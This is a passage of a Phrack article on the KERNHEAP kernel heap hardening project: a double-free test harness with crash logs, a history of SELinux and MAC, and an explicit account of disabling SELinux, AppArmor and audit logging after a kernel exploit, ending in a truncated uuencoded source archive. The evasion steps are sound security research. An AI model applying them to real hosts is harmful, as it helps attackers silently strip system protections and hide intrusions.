+    Shortly after the initial development process started, it became
+    evident that a decent set of regression tests was required to check if
+    the implementation worked as expected. While using single loadable
+    modules for each test was a straightforward solution, in the longterm,
+    having a real tool to perform thorough testing seemed the most logical
+    approach.
+
+    Hence, KHTEST has been developed. It's composed of a kernel module
+    which communicates to a userland Python program over Netlink sockets.
+    The ctypes API is used to handle the low level structures that define
+    commands and replies. The kernel module exposes internal APIs to the
+    userland process, such as:
+
+        - kmalloc
+        - kfree
+        - memset and memcpy
+        - copy_to_user and copy_from_user
+
+    Using this interface, allocation and release of kernel memory can be
+    controlled with a simple Python script, allowing efficient development
+    of testcases:
+
+        e = KernHeapTester()
+        addr = e.kmalloc(size)
+        e.kfree(addr)
+        e.kfree(addr)
+
+    When this test runs on an unprotected 2.6.29.2 system (SLAB as
+    allocator, debugging capabilities enabled) the following output can be
+    observed in the kernel message buffer, with a subsequent BUG on cache
+    reaping:
+
+        KERNHEAP test-suite loaded.
+        run_cmd_kmalloc: kmalloc(64, 000000b0) returned 0xDF1BEC30
+        run_cmd_kfree: kfree(0xDF1BEC30)
+        run_cmd_kfree: kfree(0xDF1BEC30)
+        slab error in verify_redzone_free(): cache `size-64': double free detected
+        Pid: 3726, comm: python Not tainted 2.6.29.2-grsec #1
+        Call Trace:
+         [<c0889a81>] __slab_error+0x1a/0x1c
+         [<c088aee9>] cache_free_debugcheck+0x137/0x1f5
+         [<e082f25c>] ? run_cmd_kfree+0x1e/0x23 [kernheap_test]
+         [<c088ba14>] kfree+0x9d/0xd2
+         [<e082f25c>] run_cmd_kfree+0x1e/0x23
+
+        kernel BUG at mm/slab.c:2720!
+        invalid opcode: 0000 [#1] SMP
+        last sysfs file: /sys/kernel/uevent_seqnum
+        Pid: 10, comm: events/0 Not tainted (2.6.29.2-grsec #1) VMware Virtual Platform
+        EIP: 0060:[<c088ac00>] EFLAGS: 00010092 CPU: 0
+        EIP is at slab_put_obj+0x59/0x75
+        EAX: 0000004f EBX: df1be000 ECX: c0828819 EDX: c197c000
+        ESI: 00000021 EDI: df1bec28 EBP: dfb3deb8 ESP: dfb3de9c
+        DS: 0068 ES: 0068 FS: 00d8 GS: 0000 SS: 0068
+        Process events/0 (pid: 10, ti=dfb3c000 task=dfb3ae30 task.ti=dfb3c000)
+        Stack:
+         c0bc24ee c0bc1fd7 df1bec28 df800040 df1be000 df8065e8 df800040 dfb3dee0
+         c088b42d 00000000 df1bec28 00000000 00000001 df809db4 df809db4 00000001
+         df809d80 dfb3df00 c088be34 00000000 df8065e8 df800040 df8065e8 df800040
+        Call Trace:
+         [<c088b42d>] ? free_block+0x98/0x103
+         [<c088be34>] ? drain_array+0x85/0xad
+         [<c088beba>] ? cache_reap+0x5e/0xfe
+         [<c083586a>] ? run_workqueue+0xc4/0x18c
+         [<c088be5c>] ? cache_reap+0x0/0xfe
+         [<c0838593>] ? kthread+0x0/0x59
+         [<c0803717>] ? kernel_thread_helper+0x7/0x10
+
+    The following code presents a more complex test to evaluate a
+    double-free situation which will put a random kmalloc cache into an
+    unpredictable state:
+
+        e = KernHeapTester()
+		addrs = []
+		kmalloc_sizes = [ 32, 64, 96, 128, 196, 256, 1024, 2048, 4096]
+
+		i = 0
+		while i < 1024:
+			addr = e.kmalloc(random.choice(kmalloc_sizes))
+			addrs.append(addr)
+			i += 1
+
+		random.seed(os.urandom(32))
+		random.shuffle(addrs)
+		e.kfree(random.choice(addrs))
+		random.shuffle(addrs)
+
+		for addr in addrs:
+			e.kfree(addr)
+
+    On a KERNHEAP protected host:
+
+    Kernel panic - not syncing: KERNHEAP: Invalid kfree() in (objp
+    df38e000) by python:3643, UID:0 EUID:0
+
+    The testsuite sources (including both the Python module and the LKM for
+    the 2.6 series, tested with 2.6.29) are included along this paper.
+    Adding support for new kernel APIs should be a trivial task, requiring
+    only modification of the packet handler and the appropriate addition of
+    a new command structure. Potential improvements include the use of a
+    shared memory page instead of Netlink responses, to avoid impacting the
+    allocator state or conflict with our tests.
+
+------[ 9. The Inevitability of Failure
+
+    In 1998, members (Loscocco, Smalley et. al) of the Information Assurance
+    Group at the NSA published a paper titled "The Inevitability of Failure:
+    The Flawed Assumption of Security in Modern Computing Environments"
+    [12].
+
+    The paper explains how modern computing systems lacked the necessary
+    features and capabilities for providing true assurance, to prevent
+    compromise of the information contained in them. As systems were
+    becoming more and more connected to networks, which were growing
+    exponentially, the exposure of these systems grew proportionally.
+    Therefore, the state of art in security had to progress in a similar
+    pace.
+
+    From an academic standpoint, it is interesting to observe that more
+    than 10 years later, the state of art in security hasn't evolved
+    dramatically, but threats have gone well beyond the initial
+    expectations.
+
+        "Although public awareness of the need for security
+        in computing systems is growing rapidly, current
+        efforts to provide security are unlikely to succeed.
+        Current security efforts suffer from the flawed
+        assumption that adequate security can be provided in
+        applications with the existing security mechanisms of
+        mainstream operating systems. In reality, the need for
+        secure operating systems is growing in today's computing
+        environment due to substantial increases in
+        connectivity and data sharing." Page 1, [12]
+
+    Most of the authors of this paper were involved in the development of
+    the Flux Advanced Security Kernel (FLASK), at the University of Utah.
+    Flask itself has its roots in an original joint project of the then
+    known as Secure Computing Corporation (SCC) (acquired by McAfee in
+    2008) and the National Security Agency, in 1992 and 1993, the
+    Distributed Trusted Operating System (DTOS). DTOS inherited the
+    development and design ideas of a previous project named DTMach
+    (Distributed Trusted Match) which aimed to introduce a flexible access
+    control framework into the GNU Mach microkernel. Type Enforcement was
+    first introduced in DTMach, superseded in Flask with a more flexible
+    design which allowed far greater granularity (supporting mixing of
+    different types of labels, beyond only types, such as sensitivity,
+    roles and domains).
+
+    Type Enforcement is a simple concept: a Mandatory Access Control (MAC)
+    takes precedence over a Discretionary Access Control (DAC) to contain
+    subjects (processes, users) from accessing or manipulating objects
+    (files, sockets, directories), based on the decision made by the
+    security system upon a policy and subject's attached security context.
+    A subject can undergo a transition from one security context to another
+    (for example, due to role change) if it's explicitly allowed by the
+    policy. This design allows fine-grained, albeit complex, decision
+    making.
+
+    Essentially, MAC means that everything is forbidden unless explicitly
+    allowed by a policy. Moreover, the MAC framework is fully integrated
+    into the system internals in order to catch every possible data access
+    situation and store state information.
+
+    The true benefits of these systems could be exercised mostly in
+    military or government environments, where models such as Multi-Level
+    Security (MLS) are far more applicable than for the general public.
+
+    Flask was implemented in the Fluke research operating system (using the
+    OSKit framework) and ultimately lead to the development of SELinux, a
+    modification of the Linux kernel, initially standalone and ported
+    afterwards to use the Linux Security Modules (LSM) framework when its
+    inclusion into mainline was rejected by Linus Tordvals. Flask is also
+    the basis for TrustedBSD and OpenSolaris FMAC. Apple's XNU kernel,
+    albeit being largely based off FreeBSD (which includes TrustedBSD
+    modifications since 6.0) decided to implement its own security
+    mechanism (non-MAC) known as Seatbelt, with its own policy language.
+
+    While the development of these systems represents a significant step
+    towards more secure operating systems, without doubt, the real-world
+    perspective is of a slightly more bleak nature. These systems have
+    steep learning curves (their policy languages are powerful but complex,
+    their nature is intrinsically complicated and there's little freely
+    available support for them, plus the communities dedicated to them are
+    fairly small and generally oriented towards development), impose strict
+    restrictions to the system and applications, and in several cases,
+    might be overkill to the average user or administrator.
+
+    A security system which requires (expensive, length) specialized
+    training is dramatically prone to being disabled by most of its
+    potential users. This is the reality of SELinux in Fedora and other
+    systems. The default policies aren't realistic and users will need to
+    write their own modules if they want to use custom software. In
+    addition, the solution to this problem was less then suboptimal: the
+    targeted (now modular) policy was born.
+
+    The SELinux targeted policy (used by default in Fedora 10) is
+    essentially a contradiction of the premises of MAC altogether. Most
+    applications run under the unconfined_t domain, while a small set of
+    daemons and other tools run confined under their own domains. While
+    this allows basic, usable security to be deployed (on a related note,
+    XNU Seatbelt follows a similar approach, although unsuccessfully), its
+    effectiveness to stop determined attackers is doubtful.
+
+    For instance, the Apache web server daemon (httpd) runs under the
+    httpd_t domain, and is allowed to access only those files labeled with
+    the httpd_sys_content_t type. In a PHP local file include scenario this
+    will prevent an attacker from loading system configuration files, but
+    won't prevent him from reading passwords from a PHP configuration file
+    which could provide credentials to connect to the back-end database
+    server, and further compromise the system by obtaining any access
+    information stored there. In a relatively more complex scenario, a PHP
+    code execution vulnerability could be leveraged to access the apache
+    process file descriptors, and perhaps abuse a vulnerability to leak
+    memory or inject code to intercept requests. Either way, if an attacker
+    obtains unconfined_t access, it's a game over situation. This is
+    acknowledged in [13], along an interesting citation about the managerial
+    decisions that lead to the targeted policy being developed:
+
+        "SELinux can not cause the phones to ring"
+        "SELinux can not cause our support costs to rise."
+        Strict Policy Problems, slide 5. [13]
+
+    ---[ 9.1 Subverting SELinux and the audit subsystem
+
+    Fedora comes with SELinux enabled by default, using the targeted
+    policy. In remote and local kernel exploitation scenarios, disabling
+    SELinux and the audit framework is desirable, or outright necessary if
+    MLS or more restrictive policies are used.
+
+    In March 2007, Brad Spengler sent a message to a public mailing-list,
+    announcing the availability of an exploit abusing a kernel NULL pointer
+    dereference (more specifically, an offset from NULL) which disabled all
+    LSM modules atomically, including SELinux. tee42-24tee.c exploited a
+    vulnerability in the tee() system call, which was silently fixed by
+    Jens Axboe from SUSE (as "[patch 25/45] splice: fix problems with
+    sys_tee()").
+
+    Its approach to disable SELinux locally was extremely reliable and
+    simplistic at the same. Once the kernel continues execution at the code
+    in userland, using shellcode is unnecessary. This applies only to local
+    exploits normally, and allows offset-less exploitation, resulting in
+    greater reliability. All the LSM disabling logic in tee42-24tee.c is
+    written in C which can be easily integrated in other local exploits.
+
+    The disable_selinux() function has two different stages independent
+    of each other. The first finds the selinux_enabled 32-bit integer,
+    through a linear memory search that seeks for a cmp opcode within the
+    selinux_ctxid_to_string() function (defined in selinux/exports.c and
+    present only in older kernels). In current kernels, a suitable
+    replacement is the selinux_string_to_sid() function.
+
+    Once the address to selinux_enabled is found, its value is set to zero.
+    this is the first step towards disabling SELinux. Currently, additional
+    targets should be selinux_enforcing (to disable enforcement mode) and
+    selinux_mls_enabled.
+
+    The next step is the atomic disabling of all LSM modules. This stage
+    also relies on an finding an old function of the LSM framework,
+    unregister_security(), which replaced the security_ops with
+    dummy_security_ops (a set of default hooks that perform simple DAC
+    without any further checks), given that the current security_ops
+    matched the ops parameter.
+
+    This function has disappeared in current kernels, but setting the
+    security_ops to default_security_ops achieves the same effect, and it
+    should be reasonably easy to find another function to use as reference
+    in the memory search. This change was likely part of the facelift that
+    LSM underwent to remove the possibility of using the framework in
+    loadable kernel modules.
+
+    With proper fine-tuning and changes to perform additional opcode
+    checks, recent kernels should be as easy to write a SELinux/LSM
+    disabling functionality that works across different architectures.
+
+    For remote exploitation, a typical offset-based approach like that used
+    in sgraykku's sctp_houdini.c exploit (against x86_64) should be reliable
+    and painless. Simply write a zero value to selinux_enforcing,
+    selinux_enabled and selinux_mls_enabled (albeit the first is well
+    enough). Further more, if we already know the address of security_ops
+    and default_security_ops, we can disable LSMs altogether that way too.
+
+    If an attacker has enough permissions to control a SCTP listener or run
+    his own, then remote exploitation on x86_64 platforms can be made
+    completely reliable against unknown kernels through the use of the
+    vsyscall exploitation technique, to return control to the attacker
+    controller listener in a previous mapped -fixed- address of his choice.
+    In this scenario, offset-less SELinux/LSM disabling functionality can
+    be used.
+
+    Fortunately, this isn't even necessary since most Linux distributions
+    still ship with world-readable /boot mount points, and their package
+    managers don't do anything to solve this when new kernel packages are
+    installed:
+
+        Ubuntu 8.04 (Hardy Heron)
+        -rw-r--r-- 1 root 413K  /boot/abi-2.6.24-24-generic
+        -rw-r--r-- 1 root  79K  /boot/config-2.6.24-24-generic
+        -rw-r--r-- 1 root 8.0M  /boot/initrd.img-2.6.24-24-generic
+        -rw-r--r-- 1 root 885K  /boot/System.map-2.6.24-24-generic
+        -rw-r--r-- 1 root  62M  /boot/vmlinux-debug-2.6.24-24-generic
+        -rw-r--r-- 1 root 1.9M  /boot/vmlinuz-2.6.24-24-generic
+
+         Fedora release 10 (Cambridge) 
+        -rw-r--r-- 1 root  84K  /boot/config-2.6.27.21-170.2.56.fc10.x86_64
+        -rw------- 1 root 3.5M  /boot/initrd-2.6.27.21-170.2.56.fc10.x86_64.img
+        -rw-r--r-- 1 root 1.4M  /boot/System.map-2.6.27.21-170.2.56.fc10.x86_64
+        -rwxr-xr-x 1 root 2.6M  /boot/vmlinuz-2.6.27.21-170.2.56.fc10.x86_64
+
+    Perhaps, one easy step before including complex MAC policy based
+    security frameworks, would be to learn how to use DAC properly. Contact
+    your nearest distribution security officer for more information.
+
+    ---[ 9.2 Subverting AppArmor
+
+    Ubuntu and SUSE decided to bundle AppArmor (aka SubDomain) instead
+    (Novell acquired Immunix in May 2005, only to lay off their developers
+    in September 2007, leaving AppArmor development "open for the
+    community"). AppArmor is completely different than SELinux in both
+    design and implementation.
+
+    It uses pathname based security, instead of using filesystem object
+    labeling. This represents a significant security drawback itself, since
+    different policies can apply to the same object when it's accessed by
+    different names. For example, through a symlink. In other words, the
+    security decision making logic can be forced into using a less secure
+    policy by accessing the object through a pathname that matches to an
+    existent policy. It's been argued that labeling-based approaches are
+    due to requirements of secrecy and information containment, but in
+    practice, security itself equals to information containment.
+    Theory-related discussions aside, this section will provide a basic
+    overview on how AppArmor policy enforcement works, and some techniques
+    that might be suitable in local and remote exploitation scenarios to
+    disable it.
+
+    The most simple method to disable AppArmor is to target the 32-bit
+    integers used to determine if it's initialized or enabled. In case
+    the system being targeted runs a stock kernel, the task of accessing
+    these symbols is trivial, although an offset-dependent exploit is
+    certainly suboptimal:
+
+        c03fa7ac D apparmorfs_profiles_op
+        c03fa7c0 D apparmor_path_max
+         (Determines the maximum length of paths before access is rejected
+         by default)
+
+        c03fa7c4 D apparmor_enabled
+         (Determines if AppArmor is currently enabled - used on runtime)
+
+        c04eb918 B apparmor_initialized
+         (Determines if AppArmor was enabled on boot time)
+
+        c04eb91c B apparmor_complain
+         (The equivalent to SELinux permissive mode, no enforcement)
+
+        c04eb924 B apparmor_audit
+         (Determines if the audit subsystem will be used to log messages)
+
+        c04eb928 B apparmor_logsyscall
+         (Determines if system call logging is enabled - used on runtime)
+
+    A NULL-write primitive suffices to overwrite the values of any of those
+    integers. But for local or shellcode based exploitation, a function
+    exists that can disable AppArmor on runtime, apparmor_disable(). This
+    function is straightforward and reasonably easy to fingerprint:
+
+        0xc0200e60 mov    eax,0xc03fad54
+        0xc0200e65 call   0xc031bcd0 <mutex_lock>
+        0xc0200e6a call   0xc0200110 <aa_profile_ns_list_release>
+        0xc0200e6f call   0xc01ff260 <free_default_namespace>
+        0xc0200e74 call   0xc013e910 <synchronize_rcu>
+        0xc0200e79 call   0xc0201c30 <destroy_apparmorfs>
+        0xc0200e7e mov    eax,0xc03fad54
+        0xc0200e83 call   0xc031bc80 <mutex_unlock>
+        0xc0200e88 mov    eax,0xc03bba13
+        0xc0200e8d mov    DWORD PTR ds:0xc04eb918,0x0
+        0xc0200e97 jmp    0xc0200df0 <info_message>
+
+    It sets a lock to prevent modifications to the profile list, and
+    releases it. Afterwards, it unloads the apparmorfs and releases the
+    lock, resetting the apparmor_initialized variable. This method is
+    not stealth by any means. A message will be printed to the kernel
+    message buffer notifying that AppArmor has been unloaded and the lack
+    of the apparmor directory within /sys/kernel (or the mount-point of the
+    sysfs) can be easily observed.
+
+    The apparmor_audit variable should be preferably reset to turn off
+    logging to the audit subsystem (which can be disabled itself as
+    explained in the previous section).
+
+    Both AppArmor and SELinux should be disabled together with their
+    logging facilities, since disabling enforcement alone will turn off
+    their effective restrictions, but denied operations will still get
+    recorded. Therefore, it's recommended to reset apparmor_logsyscall,
+    apparmor_audit, apparmor_enabled and apparmor_complain altogether.
+
+    Another viable option, albeit slightly more complex, is to target the
+    internals of AppArmor, more specifically, the profile list. The main
+    data structure related to profiles in AppArmor is 'aa_profile' (defined
+    in apparmor.h):
+
+        struct aa_profile {
+	        char *name;
+	        struct list_head list;
+	        struct aa_namespace *ns;
+
+	        int exec_table_size;
+	        char **exec_table;
+	        struct aa_dfa *file_rules;
+	        struct {
+		        int hat;
+		        int complain;
+		        int audit;
+	        } flags;
+	        int isstale;
+
+	        kernel_cap_t set_caps;
+	        kernel_cap_t capabilities;
+	        kernel_cap_t audit_caps;
+	        kernel_cap_t quiet_caps;
+
+	        struct aa_rlimit rlimits;
+	        unsigned int task_count;
+
+	        struct kref count;
+	        struct list_head task_contexts;
+	        spinlock_t lock;
+	        unsigned long int_flags;
+	        u16 network_families[AF_MAX];
+	        u16 audit_network[AF_MAX];
+	        u16 quiet_network[AF_MAX];
+        };
+
+    The definition in the header file is well commented, thus we will look
+    only at the interesting fields from an attacker's perspective. The
+    flags structure contains relevant fields:
+
+        1. audit: checked by the PROFILE_AUDIT macro, used to determine if
+           an event shall be passed to the audit subsystem.
+
+        2. hat: checked by the PROFILE_IS_HAT macro, used to determine if
+           this profile is a subprofile ('hat').
+
+        3. complain: checked by the PROFILE_COMPLAIN macro, used to
+           determine if this profile is in complain/non-enforcement mode
+           (for example in aa_audit(), from main.c). Events are logged but
+           no policy is enforced.
+
+    From the flags, the immediately useful ones are audit and complain, but
+    the hat flag is interesting nonetheless. AppArmor supports 'hats',
+    being subprofiles which are used for transitions from a different
+    profile to enable different permissions for the same subject. A
+    subprofile belongs to a profile and has its hat flag set. This is worth
+    looking at if, for example, altering the hat flag leads to a subprofile
+    being handled differently (ex. it remains set despite the normal
+    behavior would be to fall back to the original profile). Investigating
+    this possibility in depth is out of the scope of this article.
+
+    The task_contexts holds a list of the tasks confined by the profile
+    (the number of tasks is stored in task_count). This is an interesting
+    target for overwrites, and a look at the aa_unconfine_tasks() function
+    shows the logic to unconfine all tasks associated for a given profile.
+    The change itself is done by aa_change_task_context() with NULL
+    parameters. Each task has an associated context (struct
+    aa_task_context) which contains references to the applied profile, the
+    magic cookie, the previous profile, its task struct and other
+    information. The task context is retrieved using an inlined function:
+
+        static inline struct aa_task_context
+        *aa_task_context(struct task_struct *task)
+        {
+            return (struct aa_task_context *) rcu_dereference(task->security);
+        }
+
+    And after this dissertation on AppArmor internals, the long awaited
+    method to unconfine tasks is unfold: set task->security to NULL. It's
+    that simple, but it would have been unfair to provide the answer
+    without a little analytical effort. It should be noted that this method
+    likely works for most LSM based solutions, unless they specifically
+    handle the case of a NULL security context with a denial response.
+
+    The serialized profiles passed to the kernel are unpacked by the
+    aa_unpack_profile() function (defined in module_interface.c).
+
+    Finally, these structures are allocated within one of the standard kmem
+    caches, via kmalloc. AppArmor does not use a private cache, therefore
+    it is feasible to reach these structures in a slab overflow scenario.
+
+    The approach to abuse AppArmor isn't really different from that of any
+    other kernel security frameworks, technical details aside.
+
+------[ 10. References
+
+   [1]  "The Slab Allocator: An Object-Caching Kernel Memory Allocator"
+        Jeff Bonwick, Sun Microsystems. USENIX Summer, 1994.
+        http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.29.4759
+
+   [2]  "Anatomy of the Linux slab allocator" M. Tim Jones, Consultant
+        Engineer, Emulex Corp. 15 May 2007, IBM developerWorks.
+        http://www.ibm.com/developerworks/linux/library/l-linux-slab-allocator
+
+   [3]  "Magazines and vmem: Extending the slab allocator to many CPUs
+        and arbitrary resources" Jeff Bonwick, Sun Microsystems. In Proc.
+        2001 USENIX Technical Conference. USENIX Association.
+        http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.97.708
+
+   [4]  "The Linux Slab Allocator" Brad Fitzgibbons, 2000.
+        http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.29.4759
+
+   [5]  "SLQB - and then there were four" Jonathan Corbet, 16 December 2008.
+        http://lwn.net/Articles/311502/
+
+   [6]  "Kmalloc Internals: Exploring Linux Kernel Memory Allocation"
+        Sean.
+        http://jikos.jikos.cz/Kmalloc_Internals.html
+
+   [7]  "Address Space Layout Randomization" PaX Team, 2003.
+        http://pax.grsecurity.net/docs/aslr.txt
+
+   [8]  In-depth description of PaX UDEREF, the PaX Team.
+        http://grsecurity.net/~spender/uderef.txt
+
+   [9]  "MurmurHash2" Austin Appleby, 2007.
+        http://murmurhash.googlepages.com
+
+   [10] "Attacking the Core : Kernel Exploiting Notes" sgrakkyu and twiz,
+        Phrack #64 file 6.
+        http://phrack.org/issues.html?issue=64&id=6&mode=txt
+
+   [11] "Sysenter and the vsyscall page" The Linux kernel. Andries
+        Brouwer, 2003.
+        http://www.win.tue.nl/~aeb/linux/lk/lk-4.html
+
+   [12] "The Inevitability of Failure: The Flawed Assumption of Security in
+        Modern Computing Environments" Peter A. Loscocco, Stephen D.
+        Smalley, Patrick A. Muckelbauer, Ruth C. Taylor, S. Jeff Turner,
+        John F. Farrell. In Proceedings of the 21st National Information
+        Systems Security Conference.
+        http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.117.5890
+
+   [13] "Targeted vs Strict policy History and Strategy" Dan Walsh. 3 March
+        2005. In Proceedings of the 2005 SELinux Symposium.
+        http://selinux-symposium.org/2005/presentations/session4/4-1-walsh.pdf
+
+   [14] "Exploiting Kernel Pool Overflows" Kostya Kortchinsky. 11 June
+        2008. In Proceedings of SyScan'08 Hong Kong.
+        http://immunitysec.com/downloads/KernelPool.odp
+
+   [15] "When a "potential D.o.S." means a one-shot remote kernel exploit:
+        the SCTP story" sgrakkyu. 27 April 2009.
+        http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html
+
+------[ 11. Thanks and final statements
+
+        "For there is nothing hid, which shall not be manifested; neither was
+        any thing kept secret, but that it should come abroad."
+        Mark IV:XXII
+
+    The research and work for KERNHEAP has been conducted by Larry
+    Highsmith of Subreption LLC. Thanks to Brad Spengler, for his
+    contributions to the otherwise collapsing Linux security in the past
+    decade, the PaX Team (for the same reason, and their behind-the
+    iron-curtain support, technical acumen and patience). Thanks to the
+    editorial staff, for letting me publish this work in a convenient
+    technical channel away of the encumbrances and distractions present in
+    other forums, where facts and truth can't be expressed non-distilled,
+    for those morally obligated to do so. Thanks to sgrakkyu for his
+    feedback, attitude and technical discussions on kernel exploitation.
+
+    The decision of SUSE and Canonical to choose AppArmor over more
+    complete solutions like grsecurity will clearly take a toll in its
+    security in the long term. This applies to Fedora and Red Hat
+    Enterprise Linux, albeit SELinux is well suited for federal customers,
+    which are a relevant part of their user base. The problem, though, is
+    the inability of SELinux to contemplate kernel vulnerabilities in its
+    threat model, and the lack of sound and well informed interest on
+    developing such protections from the side of the Linux kernel
+    developers. Hopefully, as time passes on and the current maintainers
+    grow older, younger developers will come to replace them in their
+    management roles. If they get over past mistakes and don't inherit old
+    grudges and conflicts of interest, there's hope the Linux kernel will
+    be more receptive to security patches which actually provide effective
+    protections, for the benefit of the whole community.
+    
+    Paraphrasing the last words of a character from an Alexandre Dumas
+    novel: until the future deigns to reveal the fate of Linux security
+    to us, all wisdom can be summed up in these two words: Wait and hope.
+
+    Last but not least, It should be noted that currently no true mechanism
+    exists to enforce kernel security protections, and thus, KERNHEAP and
+    grsecurity could also fall prey to more or less realistic attacks. The
+    requirements to do this go beyond the capabilities of currently
+    available hardware, and Trusted Computing seems to be taking a more
+    DRM-oriented direction, which serves some commercial interests well,
+    but leaves security lagging behind for another ten years.
+
+    We present the next kernel security technology from yesterday, to be
+    found independently implemented by OpenBSD, Red Hat, Microsoft or all
+    of them at once, tomorrow.
+
+        "And ye shall know the truth, and the truth shall make you free."
+        John VIII:XXXII
+
+------[ 12. Source code
+
+begin 644 kernheap_phrack-66.tgz
+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
